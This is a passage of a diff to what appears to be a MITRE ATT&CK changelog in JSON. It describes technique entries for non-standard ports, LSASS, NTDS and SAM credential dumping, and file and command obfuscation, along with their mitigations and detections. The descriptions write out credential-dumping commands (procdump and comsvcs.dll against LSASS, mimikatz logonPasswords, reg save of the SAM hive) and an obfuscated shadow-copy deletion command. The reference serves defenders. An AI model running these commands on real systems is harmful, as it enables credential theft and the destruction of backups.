+                    "previous_version": "2.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1030: Network Segmentation",
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0457: Detection of Non-Application Layer Protocols for C2"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-14 18:18:32.443000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Non-Standard Port",
+                    "description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1571",
+                            "external_id": "T1571"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Symantec Elfin Mar 2019",
+                            "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+                            "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
+                        },
+                        {
+                            "source_name": "change_rdp_port_conti",
+                            "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved September 12, 2024.",
+                            "url": "https://x.com/TheDFIRReport/status/1498657772254240768"
+                        },
+                        {
+                            "source_name": "Fortinet Agent Tesla April 2018",
+                            "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
+                            "url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2025-10-24 17:49:14.187000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1030: Network Segmentation",
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0227: Detection Strategy for Non-Standard Ports"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:41:44.783000+00:00",
+                    "modified": "2026-05-12 15:12:00.637000+00:00",
+                    "name": "LSASS Memory",
+                    "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* <code>procdump -ma lsass.exe lsass_dump</code>\n\nLocally, mimikatz can be run using:\n\n* <code>sekurlsa::Minidump lsassdump.dmp</code>\n* <code>sekurlsa::logonPasswords</code>\n\nBuilt-in Windows tools such as `comsvcs.dll` can also be used:\n\n* <code>rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\nSimilar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1003/001",
+                            "external_id": "T1003.001"
+                        },
+                        {
+                            "source_name": "Medium Detecting Attempts to Steal Passwords from Memory",
+                            "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.",
+                            "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea"
+                        },
+                        {
+                            "source_name": "Deep Instinct LSASS",
+                            "description": "Gilboa, A. (2021, February 16). LSASS Memory Dumps are Stealthier than Ever Before - Part 2. Retrieved December 27, 2023.",
+                            "url": "https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2"
+                        },
+                        {
+                            "source_name": "Graeber 2014",
+                            "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.",
+                            "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html"
+                        },
+                        {
+                            "source_name": "Volexity Exchange Marauder March 2021",
+                            "description": "Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.",
+                            "url": "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+                        },
+                        {
+                            "source_name": "Powersploit",
+                            "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.",
+                            "url": "https://github.com/mattifestation/PowerSploit"
+                        },
+                        {
+                            "source_name": "Symantec Attacks Against Government Sector",
+                            "description": "Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.",
+                            "url": "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf"
+                        },
+                        {
+                            "source_name": "TechNet Blogs Credential Protection",
+                            "description": "Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.",
+                            "url": "https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Edward Millington",
+                        "Ed Williams, Trustwave, SpiderLabs",
+                        "Olaf Hartong, Falcon Force",
+                        "Michael Forret, Quorum Cyber"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.637000+00:00\", \"old_value\": \"2025-10-24 17:48:52.657000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1025: Privileged Process Integrity",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1028: Operating System Configuration",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1043: Credential Access Protection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0363: Detection of Credential Dumping from LSASS Memory via Access and Dump Sequence"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:42:35.572000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "NTDS",
+                    "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\\NTDS\\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)\n\nIn addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1003/003",
+                            "external_id": "T1003.003"
+                        },
+                        {
+                            "source_name": "Metcalf 2015",
+                            "description": "Metcalf, S. (2015, January 19). Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest. Retrieved February 3, 2015.",
+                            "url": "http://adsecurity.org/?p=1275"
+                        },
+                        {
+                            "source_name": "Wikipedia Active Directory",
+                            "description": "Wikipedia. (2018, March 10). Active Directory. Retrieved April 11, 2018.",
+                            "url": "https://en.wikipedia.org/wiki/Active_Directory"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ed Williams, Trustwave, SpiderLabs"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-10-24 17:49:34.852000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1041: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0586: Detection of NTDS.dit Credential Dumping from Domain Controllers"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:42:07.281000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Security Account Manager",
+                    "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* <code>reg save HKLM\\sam sam</code>\n* <code>reg save HKLM\\system system</code>\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)\n\nNotes: \n\n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1003/002",
+                            "external_id": "T1003.002"
+                        },
+                        {
+                            "source_name": "GitHub Creddump7",
+                            "description": "Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018.",
+                            "url": "https://github.com/Neohapsis/creddump7"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ed Williams, Trustwave, SpiderLabs",
+                        "Olaf Hartong, Falcon Force"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2025-10-24 17:48:26.545000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0085: Credential Dumping from SAM via Registry Dump and Local File Access"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:32.662000+00:00",
+                    "modified": "2026-05-12 15:12:00.708000+00:00",
+                    "name": "Obfuscated Files or Information",
+                    "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.(Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027",
+                            "external_id": "T1027"
+                        },
+                        {
+                            "source_name": "Volexity PowerDuke November 2016",
+                            "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.",
+                            "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
+                        },
+                        {
+                            "source_name": "FireEye Obfuscation June 2017",
+                            "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.",
+                            "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html"
+                        },
+                        {
+                            "source_name": "FireEye Revoke-Obfuscation July 2017",
+                            "description": "Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved November 17, 2024.",
+                            "url": "https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf"
+                        },
+                        {
+                            "source_name": "Linux/Cdorked.A We Live Security Analysis",
+                            "description": "Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.",
+                            "url": "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/"
+                        },
+                        {
+                            "source_name": "Carbon Black Obfuscation Sept 2016",
+                            "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.",
+                            "url": "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/"
+                        },
+                        {
+                            "source_name": "PaloAlto EncodedCommand March 2017",
+                            "description": "White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Christiaan Beek, @ChristiaanBeek",
+                        "Red Canary"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.708000+00:00\", \"old_value\": \"2026-04-15 22:14:56.435000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1047: Audit",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0378: Behavioral Detection of Obfuscated Files or Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-05 14:04:25.865000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Binary Padding",
+                    "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/001",
+                            "external_id": "T1027.001"
+                        },
+                        {
+                            "source_name": "ESET OceanLotus",
+                            "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
+                            "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
+                        },
+                        {
+                            "source_name": "Securelist Malware Tricks April 2017",
+                            "description": "Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.",
+                            "url": "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/"
+                        },
+                        {
+                            "source_name": "VirusTotal FAQ",
+                            "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.",
+                            "url": "https://www.virustotal.com/en/faq/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Martin Jirkal, ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2026-04-15 22:15:33.904000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0553: Detection Strategy for Obfuscated Files or Information: Binary Padding"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-14 17:36:01.022000+00:00",
+                    "modified": "2026-05-12 15:12:00.718000+00:00",
+                    "name": "Command Obfuscation",
+                    "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`\u201cWor\u201d+\u201cd.Application\u201d`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/010",
+                            "external_id": "T1027.010"
+                        },
+                        {
+                            "source_name": "Twitter Richard WMIC",
+                            "description": "Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12, 2024.",
+                            "url": "https://x.com/rfackroyd/status/1639136000755765254"
+                        },
+                        {
+                            "source_name": "Invoke-Obfuscation",
+                            "description": "Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved March 17, 2023.",
+                            "url": "https://github.com/danielbohannon/Invoke-Obfuscation"
+                        },
+                        {
+                            "source_name": "Invoke-DOSfuscation",
+                            "description": "Bohannon, D. (2018, March 19). Invoke-DOSfuscation. Retrieved March 17, 2023.",
+                            "url": "https://github.com/danielbohannon/Invoke-DOSfuscation"
+                        },
+                        {
+                            "source_name": "FireEye Obfuscation June 2017",
+                            "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.",
+                            "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html"
+                        },
+                        {
+                            "source_name": "Malware Monday VBE",
+                            "description": "Bromiley, M. (2016, December 27). Malware Monday: VBScript and VBE Files. Retrieved March 17, 2023.",
+                            "url": "https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16"
+                        },
+                        {
